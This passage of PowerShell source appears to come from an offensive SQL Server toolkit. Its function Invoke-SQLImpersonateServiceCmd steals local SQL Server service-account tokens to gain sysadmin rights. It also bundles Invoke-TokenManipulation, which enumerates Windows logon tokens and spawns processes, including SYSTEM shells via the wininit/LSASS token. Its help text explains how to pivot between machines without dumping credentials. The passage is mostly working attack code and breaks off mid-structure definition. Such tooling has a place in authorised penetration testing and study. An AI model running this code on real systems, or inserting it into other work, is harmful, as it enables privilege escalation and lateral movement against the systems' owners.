---------------------------------------\n# Invoke-SQLImpersonateServiceCmd\n# ---------------------------------------\n# Author: Scott Sutherland (Invoke-TokenManipulation wrapper)\n# Author:  Joe Bialek (Invoke-TokenManipulation)\nFunction Invoke-SQLImpersonateServiceCmd\n{\n    <#\n            .SYNOPSIS\n            This function will download the Invoke-TokenManipulation function written by Joe Bialek and use it \n            to impersonate local SQL Server service accounts in order to gain sysadmin privileges on local \n            SQL Server instances.  By default, the function will open a cmd.exe for all local services used \n            by SQL Server.  However, an alternative executable can also be provided (like ssms and PowerShell). \n            Note1: This function requires local administrative or localsystem privileges.\n            Note2: Currently, this function only supports local execution, but it can be run remotely via WMI or\n            PowerShell remoting.\n            .PARAMETER Instance\n            SQL Server instance to connection to. If no instance is provided this script will open a seperate cmd.exe\n            running in the context of each SQL Server service.\n            .PARAMETER Exe\n            Executable to run.\n            .PARAMETER EngineOnly\n            Only run command in the context of SQL Server database engine service accounts.\n            .EXAMPLE\n            This will pop up a cmd.exe console for every service used by SQL Server on the local system, and\n            the cmd.exe will be running in the context of the associated service account.\n            PS C:\\> Invoke-SQLImpersonateServiceCmd            \n            .EXAMPLE\n            This will pop up a cmd.exe consoles running as the SQL Server service accounts associated with \n            the provided SQL Server instance.\n            PS C:\\> Get-SQLInstanceLocal | Invoke-SQLImpersonateServiceCmd -Verbose\n            .EXAMPLE\n            This will pop up a cmd.exe consoles running as the SQL Server service accounts associated with \n            the provided SQL Server instance.\n            the cmd.exe will be running in the context of the associated service account.\n            PS C:\\> Invoke-SQLImpersonateServiceCmd -Verbose -Instance SQLServer1\\STANDARDDEV2014\n            .EXAMPLE\n            This will run the provided powershell command as the SQL Server datbase engine service account associated with the \n            provided instance.             \n            PS C:\\> Invoke-SQLImpersonateServiceCmd -Verbose -Instance SQLServer1\\STANDARDDEV2014 -EngineOnly -Exe 'PowerShell -c \"notepad.exe\"'\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Executable to run. Cmd.exe and Ssms.exe are recommended.')]\n        [string]$Exe = 'cmd.exe',\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Only run commands in the context of SQL Server database engine service accounts.')]\n        [switch]$EngineOnly\n    )\n\n    Begin {\n        \n        # Check if the current process has elevated privs\n        # https://msdn.microsoft.com/en-us/library/system.security.principal.windowsprincipal(v=vs.110).aspx\n        Write-Verbose \"Verifying local adminsitrator privileges...\"\n        $CurrentIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent()\n        $prp = New-Object -TypeName System.Security.Principal.WindowsPrincipal -ArgumentList ($CurrentIdentity)\n        $adm = [System.Security.Principal.WindowsBuiltInRole]::Administrator\n        $IsAdmin = $prp.IsInRole($adm)\n        if($IsAdmin){\n             Write-Verbose \"The current user has local administrator privileges.\"\n        }else{\n             Write-Verbose \"The current user DOES NOT have local administrator privileges. Aborting.\"\n             return\n        }\n    }\n\n    Process {\n\n        # Status user        \n        Write-Output \"Note: The verbose flag will give you more info if you need it.\"\n\n        # Get SQL services\n        Write-Verbose \"Gathering list of SQL Server services running locally...\"\n        if($EngineOnly){\n            $LocalSQLServices = Get-SQLServiceLocal -Instance $Instance -RunOnly | Where-Object {$_.ServicePath -like \"*sqlservr.exe*\"}  | Sort-Object Instance\n            Write-Verbose \"Only the database engine service accounts will be targeted.\"\n        }else{\n            $LocalSQLServices = Get-SQLServiceLocal -Instance $Instance -RunOnly | Sort-Object Instance\n        }\n\n        # Get running processes\n        Write-Verbose \"Gathering list of local processes...\"\n        $LocalProcesses = Get-WmiObject -Class win32_process | Select-Object processid,ExecutablePath\n        \n        Write-Verbose \"Targeting SQL Server processes...\"        \n\n        # Grab SQL Service executable inforrmation\n        $LocalSQLServices |\n        ForEach-Object {\n            \n            $s_pathname = $_.ServicePath.Split(\"`\"\")[1]\n            $s_displayname = $_.ServiceDisplayName\n            $s_serviceaccount = $_.ServiceAccount   \n            $s_instance = $_.Instance  \n                        \n            # Grab process information\n            $LocalProcesses | \n            ForEach-Object {\n  \n                $p_ExecutablePath = $_.ExecutablePath\n                $p_processid = $_.processid\n\n                # Run executable as service account\n                if($s_pathname -like \"$p_ExecutablePath\"){\n\n                    Write-Output \"$s_instance - Service: $s_displayname - Running command `\"$Exe`\" as $s_serviceaccount\"\n\n                    # Setup command\n                    $MyCmd = \"/C $Exe\"\n\n                    # Run command                    \n                    Invoke-TokenManipulation -CreateProcess 'cmd.exe' -ProcessArgs $MyCmd -ProcessId $p_processid -ErrorAction SilentlyContinue\n\n                    # \n                }\n            }               \n        }               \n    }\n\n    End {\n    \n        # Status user\n        Write-Output \"All done.\"\n    }\n}\n\n\n#endregion\n\n#########################################################################\n#\n#region          THIRD PARTY FUNCTIONS\n#\n#########################################################################\n\n\n# -------------------------------------------\n# Function: Invoke-TokenManipulation\n# -------------------------------------------\n# Author: Joe Bialek, Twitter: @JosephBialek\nfunction Invoke-TokenManipulation\n{\n<#\n.SYNOPSIS\n\nThis script requires Administrator privileges. It can enumerate the Logon Tokens available and use them to create new processes. This allows you to use\nanothers users credentials over the network by creating a process with their logon token. This will work even with Windows 8.1 LSASS protections.\nThis functionality is very similar to the incognito tool (with some differences, and different use goals).\n\nThis script can also make the PowerShell thread impersonate another users Logon Token. Unfortunately this doesn't work well, because PowerShell\ncreates new threads to do things, and those threads will use the Primary token of the PowerShell process (your original token) and not the token\nthat one thread is impersonating. Because of this, you cannot use thread impersonation to impersonate a user and then use PowerShell remoting to connect\nto another server as that user (it will authenticate using the primary token of the process, which is your original logon token).\n\nBecause of this limitation, the recommended way to use this script is to use CreateProcess to create a new PowerShell process with another users Logon \nToken, and then use this process to pivot. This works because the entire process is created using the other users Logon Token, so it will use their\ncredentials for the authentication.\n\nIMPORTANT: If you are creating a process, by default this script will modify the ACL of the current users desktop to allow full control to \"Everyone\". \nThis is done so that the UI of the process is shown. If you do not need the UI, use the -NoUI flag to prevent the ACL from being modified. This ACL\nis not permenant, as in, when the current logs off the ACL is cleared. It is still preferrable to not modify things unless they need to be modified though,\nso I created the NoUI flag. ALSO: When creating a process, the script will request SeSecurityPrivilege so it can enumerate and modify the ACL of the desktop.\nThis could show up in logs depending on the level of monitoring.\n\n\nPERMISSIONS REQUIRED:\nSeSecurityPrivilege: Needed if launching a process with a UI that needs to be rendered. Using the -NoUI flag blocks this.\nSeAssignPrimaryTokenPrivilege : Needed if launching a process while the script is running in Session 0.\n\n\nImportant differences from incognito:\nFirst of all, you should probably read the incognito white paper to understand what incognito does. If you use incognito, you'll notice it differentiates\nbetween \"Impersonation\" and \"Delegation\" tokens. This is because incognito can be used in situations where you get remote code execution against a service\nwhich has threads impersonating multiple users. Incognito can enumerate all tokens available to the service process, and impersonate them (which might allow\nyou to elevate privileges). This script must be run as administrator, and because you are already an administrator, the primary use of this script is for pivoting\nwithout dumping credentials. \n\nIn this situation, Impersonation vs Delegation does not matter because an administrator can turn any token in to a primary token (delegation rights). What does\nmatter is the logon type used to create the logon token. If a user connects using Network Logon (aka type 3 logon), the computer will not have any credentials for \nthe user. Since the computer has no credentials associated with the token, it will not be possible to authenticate off-box with the token. All other logon types\nshould have credentials associated with them (such as Interactive logon, Service logon, Remote interactive logon, etc). Therefore, this script looks\nfor tokens which were created with desirable logon tokens (and only displays them by default).\n\nIn a nutshell, instead of worrying about \"delegation vs impersonation\" tokens, you should worry about NetworkLogon (bad) vs Non-NetworkLogon (good).\n\n\nPowerSploit Function: Invoke-TokenManipulation\nAuthor: Joe Bialek, Twitter: @JosephBialek\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: None\nVersion: 1.11\n(1.1 -> 1.11: PassThru of System.Diagnostics.Process object added by Rune Mariboe, https://www.linkedin.com/in/runemariboe)\n\n.DESCRIPTION\n\nLists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread.\n\n.PARAMETER Enumerate\n\nSwitch. Specifics to enumerate logon tokens available. By default this will only list unqiue usable tokens (not network-logon tokens).\n\n.PARAMETER RevToSelf\n\nSwitch. Stops impersonating an alternate users Token.\n\n.PARAMETER ShowAll\n\nSwitch. Enumerate all Logon Tokens (including non-unique tokens and NetworkLogon tokens).\n\n.PARAMETER ImpersonateUser\n\nSwitch. Will impersonate an alternate users logon token in the PowerShell thread. Can specify the token to use by Username, ProcessId, or ThreadId.\n    This mode is not recommended because PowerShell is heavily threaded and many actions won't be done in the current thread. Use CreateProcess instead.\n\t\n.PARAMETER CreateProcess\n\nSpecify a process to create with an alternate users logon token. Can specify the token to use by Username, ProcessId, or ThreadId.\n\t\n.PARAMETER WhoAmI\n\nSwitch. Displays the credentials the PowerShell thread is running under.\n\n.PARAMETER Username\n\nSpecify the Token to use by username. This will choose a non-NetworkLogon token belonging to the user.\n\n.PARAMETER ProcessId\n\nSpecify the Token to use by ProcessId. This will use the primary token of the process specified.\n\n.PARAMETER Process\n\nSpecify the token to use by process object (will use the processId under the covers). This will impersonate the primary token of the process.\n\n.PARAMETER ThreadId\n\nSpecify the Token to use by ThreadId. This will use the token of the thread specified.\n\n.PARAMETER ProcessArgs\n\nSpecify the arguments to start the specified process with when using the -CreateProcess mode.\n\n.PARAMETER NoUI\n\nIf you are creating a process which doesn't need a UI to be rendered, use this flag. This will prevent the script from modifying the Desktop ACL's of the \ncurrent user. If this flag isn't set and -CreateProcess is used, this script will modify the ACL's of the current users desktop to allow full control\nto \"Everyone\".\n\n.PARAMETER PassThru\n\nIf you are creating a process, this will pass the System.Diagnostics.Process object to the pipeline.\n\n\t\n.EXAMPLE\n\nInvoke-TokenManipulation -Enumerate\n\nLists all unique usable tokens on the computer.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -CreateProcess \"cmd.exe\" -Username \"nt authority\\system\"\n\nSpawns cmd.exe as SYSTEM.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -ImpersonateUser -Username \"nt authority\\system\"\n\nMakes the current PowerShell thread impersonate SYSTEM.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -CreateProcess \"cmd.exe\" -ProcessId 500\n\nSpawns cmd.exe using the primary token belonging to process ID 500.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -ShowAll\n\nLists all tokens available on the computer, including non-unique tokens and tokens created using NetworkLogon.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -CreateProcess \"cmd.exe\" -ThreadId 500\n\nSpawns cmd.exe using the token belonging to thread ID 500.\n\n.EXAMPLE\n\nGet-Process wininit | Invoke-TokenManipulation -CreateProcess \"cmd.exe\"\n\nSpawns cmd.exe using the primary token of LSASS.exe. This pipes the output of Get-Process to the \"-Process\" parameter of the script.\n\n.EXAMPLE\n\n(Get-Process wininit | Invoke-TokenManipulation -CreateProcess \"cmd.exe\" -PassThru).WaitForExit()\n\nSpawns cmd.exe using the primary token of LSASS.exe. Then holds the spawning PowerShell session until that process has exited.\n\n.EXAMPLE\n\nGet-Process wininit | Invoke-TokenManipulation -ImpersonateUser\n\nMakes the current thread impersonate the lsass security token.\n\n.NOTES\nThis script was inspired by incognito. \n\nSeveral of the functions used in this script were written by Matt Graeber(Twitter: @mattifestation, Blog: http://www.exploit-monday.com/).\nBIG THANKS to Matt Graeber for helping debug.\n\n.LINK\n\nBlog: http://clymb3r.wordpress.com/\nGithub repo: https://github.com/clymb3r/PowerShell\nBlog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/\n\n#>\n\n    [CmdletBinding(DefaultParameterSetName=\"Enumerate\")]\n    Param(\n        [Parameter(ParameterSetName = \"Enumerate\")]\n        [Switch]\n        $Enumerate,\n\n        [Parameter(ParameterSetName = \"RevToSelf\")]\n        [Switch]\n        $RevToSelf,\n\n        [Parameter(ParameterSetName = \"ShowAll\")]\n        [Switch]\n        $ShowAll,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\")]\n        [Switch]\n        $ImpersonateUser,\n\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [String]\n        $CreateProcess,\n\n        [Parameter(ParameterSetName = \"WhoAmI\")]\n        [Switch]\n        $WhoAmI,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\")]\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [String]\n        $Username,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\")]\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [Int]\n        $ProcessId,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\", ValueFromPipeline=$true)]\n        [Parameter(ParameterSetName = \"CreateProcess\", ValueFromPipeline=$true)]\n        [System.Diagnostics.Process]\n        $Process,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\")]\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        $ThreadId,\n\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [String]\n        $ProcessArgs,\n\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [Switch]\n        $NoUI,\n\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [Switch]\n        $PassThru,\n\n        [Parameter(Mandatory = $false,ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance\n    )\n   \n    Set-StrictMode -Version 2\n\n\t#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\tFunction Get-DelegateType\n\t{\n\t    Param\n\t    (\n\t        [OutputType([Type])]\n\t        \n\t        [Parameter( Position = 0)]\n\t        [Type[]]\n\t        $Parameters = (New-Object Type[](0)),\n\t        \n\t        [Parameter( Position = 1 )]\n\t        [Type]\n\t        $ReturnType = [Void]\n\t    )\n\n\t    $Domain = [AppDomain]::CurrentDomain\n\t    $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')\n\t    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)\n\t    $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\n\t    $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)\n\t    $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')\n\t    $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)\n\t    $MethodBuilder.SetImplementationFlags('Runtime, Managed')\n\t    \n\t    Write-Output $TypeBuilder.CreateType()\n\t}\n\n\n\t#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\tFunction Get-ProcAddress\n\t{\n\t    Param\n\t    (\n\t        [OutputType([IntPtr])]\n\t    \n\t        [Parameter( Position = 0, Mandatory = $True )]\n\t        [String]\n\t        $Module,\n\t        \n\t        [Parameter( Position = 1, Mandatory = $True )]\n\t        [String]\n\t        $Procedure\n\t    )\n\n\t    # Get a reference to System.dll in the GAC\n\t    $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |\n\t        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }\n\t    $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')\n\t    # Get a reference to the GetModuleHandle and GetProcAddress methods\n\t    $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')\n\t    $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')\n\t    # Get a handle to the module specified\n\t    $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))\n\t    $tmpPtr = New-Object IntPtr\n\t    $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)\n\n\t    # Return the address of the function\n\t    Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))\n\t}\n\n    ###############################\n    #Win32Constants\n    ###############################\n    $Constants = @{\n        ACCESS_SYSTEM_SECURITY = 0x01000000\n        READ_CONTROL = 0x00020000\n        SYNCHRONIZE = 0x00100000\n        STANDARD_RIGHTS_ALL = 0x001F0000\n        TOKEN_QUERY = 8\n        TOKEN_ADJUST_PRIVILEGES = 0x20\n        ERROR_NO_TOKEN = 0x3f0\n        SECURITY_DELEGATION = 3\n        DACL_SECURITY_INFORMATION = 0x4\n        ACCESS_ALLOWED_ACE_TYPE = 0x0\n        STANDARD_RIGHTS_REQUIRED = 0x000F0000\n        DESKTOP_GENERIC_ALL = 0x000F01FF\n        WRITE_DAC = 0x00040000\n        OBJECT_INHERIT_ACE = 0x1\n        GRANT_ACCESS = 0x1\n        TRUSTEE_IS_NAME = 0x1\n        TRUSTEE_IS_SID = 0x0\n        TRUSTEE_IS_USER = 0x1\n        TRUSTEE_IS_WELL_KNOWN_GROUP = 0x5\n        TRUSTEE_IS_GROUP = 0x2\n        PROCESS_QUERY_INFORMATION = 0x400\n        TOKEN_ASSIGN_PRIMARY = 0x1\n        TOKEN_DUPLICATE = 0x2\n        TOKEN_IMPERSONATE = 0x4\n        TOKEN_QUERY_SOURCE = 0x10\n        STANDARD_RIGHTS_READ = 0x20000\n        TokenStatistics = 10\n        TOKEN_ALL_ACCESS = 0xf01ff\n        MAXIMUM_ALLOWED = 0x02000000\n        THREAD_ALL_ACCESS = 0x1f03ff\n        ERROR_INVALID_PARAMETER = 0x57\n        LOGON_NETCREDENTIALS_ONLY = 0x2\n        SE_PRIVILEGE_ENABLED = 0x2\n        SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x1\n        SE_PRIVILEGE_REMOVED = 0x4\n    }\n\n    $Win32Constants = New-Object PSObject -Property $Constants\n    ###############################\n\n\n    ###############################\n    #Win32Structures\n    ###############################\n\t#Define all the structures/enums that will be used\n\t#\tThis article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html\n\t$Domain = [AppDomain]::CurrentDomain\n\t$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')\n\t$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)\n\t$ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]\n\n    #ENUMs\n\t$TypeBuilder = $ModuleBuilder.DefineEnum('TOKEN_INFORMATION_CLASS', 'Public', [UInt32])\n\t$TypeBuilder.DefineLiteral('TokenUser', [UInt32] 1) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenGroups', [UInt32] 2) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenPrivileges', [UInt32] 3) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenOwner', [UInt32] 4) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenPrimaryGroup', [UInt32] 5) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenDefaultDacl', [UInt32] 6) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSource', [UInt32] 7) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenType', [UInt32] 8) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenImpersonationLevel', [UInt32] 9) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenStatistics', [UInt32] 10) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenRestrictedSids', [UInt32] 11) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSessionId', [UInt32] 12) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenGroupsAndPrivileges', [UInt32] 13) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSessionReference', [UInt32] 14) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSandBoxInert', [UInt32] 15) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenAuditPolicy', [UInt32] 16) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenOrigin', [UInt32] 17) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenElevationType', [UInt32] 18) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenLinkedToken', [UInt32] 19) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenElevation', [UInt32] 20) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenHasRestrictions', [UInt32] 21) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenAccessInformation', [UInt32] 22) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenVirtualizationAllowed', [UInt32] 23) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenVirtualizationEnabled', [UInt32] 24) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenIntegrityLevel', [UInt32] 25) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenUIAccess', [UInt32] 26) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenMandatoryPolicy', [UInt32] 27) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenLogonSid', [UInt32] 28) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenIsAppContainer', [UInt32] 29) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenCapabilities', [UInt32] 30) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenAppContainerSid', [UInt32] 31) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenAppContainerNumber', [UInt32] 32) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenUserClaimAttributes', [UInt32] 33) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenDeviceClaimAttributes', [UInt32] 34) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenRestrictedUserClaimAttributes', [UInt32] 35) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenRestrictedDeviceClaimAttributes', [UInt32] 36) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenDeviceGroups', [UInt32] 37) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenRestrictedDeviceGroups', [UInt32] 38) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSecurityAttributes', [UInt32] 39) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenIsRestricted', [UInt32] 40) | Out-Null\n    $TypeBuilder.DefineLiteral('MaxTokenInfoClass', [UInt32] 41) | Out-Null\n\t$TOKEN_INFORMATION_CLASS = $TypeBuilder.CreateType()\n\n    #STRUCTs\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('LARGE_INTEGER', $Attributes, [System.ValueType], 8)\n\t$TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null\n\t$LARGE_INTEGER = $TypeBuilder.CreateType()\n\n    #Struct LUID\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)\n\t$TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('HighPart', [Int32], 'Public') | Out-Null\n\t$LUID = $TypeBuilder.CreateType()\n\n    #Struct TOKEN_STATISTICS\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('TOKEN_STATISTICS', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('TokenId', $LUID, 'Public') | Out-Null\n\t$TypeBuilder.DefineField('AuthenticationId', $LUID, 'Public') | Out-Null\n    $TypeBuilder.DefineField('ExpirationTime', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('TokenType', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('ImpersonationLevel', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('DynamicCharged', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('DynamicAvailable', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('GroupCount', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('ModifiedId', $LUID, 'Public') | Out-Null\n\t$TOKEN_STATISTICS = $TypeBuilder.CreateType()\n\n    #Struct LSA_UNICODE_STRING\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('LSA_UNICODE_STRING', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('Length', [UInt16], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('MaximumLength', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Buffer', [IntPtr], 'Public') | Out-Null\n\t$LSA_UNICODE_STRING = $TypeBuilder.CreateType()\n\n    #Struct LSA_LAST_INTER_LOGON_INFO\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('LSA_LAST_INTER_LOGON_INFO', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('LastSuccessfulLogon', $LARGE_INTEGER, 'Public') | Out-Null\n\t$TypeBuilder.DefineField('LastFailedLogon', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('FailedAttemptCountSinceLastSuccessfulLogon', [UInt32], 'Public') | Out-Null\n\t$LSA_LAST_INTER_LOGON_INFO = $TypeBuilder.CreateType()\n\n    #Struct SECURITY_LOGON_SESSION_DATA\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('SECURITY_LOGON_SESSION_DATA', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('Size', [UInt32], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('LoginID', $LUID, 'Public') | Out-Null\n    $TypeBuilder.DefineField('Username', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LoginDomain', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('AuthenticationPackage', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LogonType', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Session', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Sid', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('LoginTime', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LoginServer', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('DnsDomainName', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('Upn', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('UserFlags', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('LastLogonInfo', $LSA_LAST_INTER_LOGON_INFO, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LogonScript', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('ProfilePath', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('HomeDirectory', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('HomeDirectoryDrive', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LogoffTime', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('KickOffTime', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('PasswordLastSet', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('PasswordCanChange', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('PasswordMustChange', $LARGE_INTEGER, 'Public') | Out-Null\n\t$SECURITY_LOGON_SESSION_DATA = $TypeBuilder.CreateType()\n\n    #Struct STARTUPINFO\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('STARTUPINFO', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('cb', [UInt32], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('lpReserved', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('lpDesktop', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('lpTitle', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwX', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwY', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwXSize', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwYSize', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwXCountChars', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwYCountChars', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwFillAttribute', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('wShowWindow', [UInt16], 'Public') | Out-Null\n   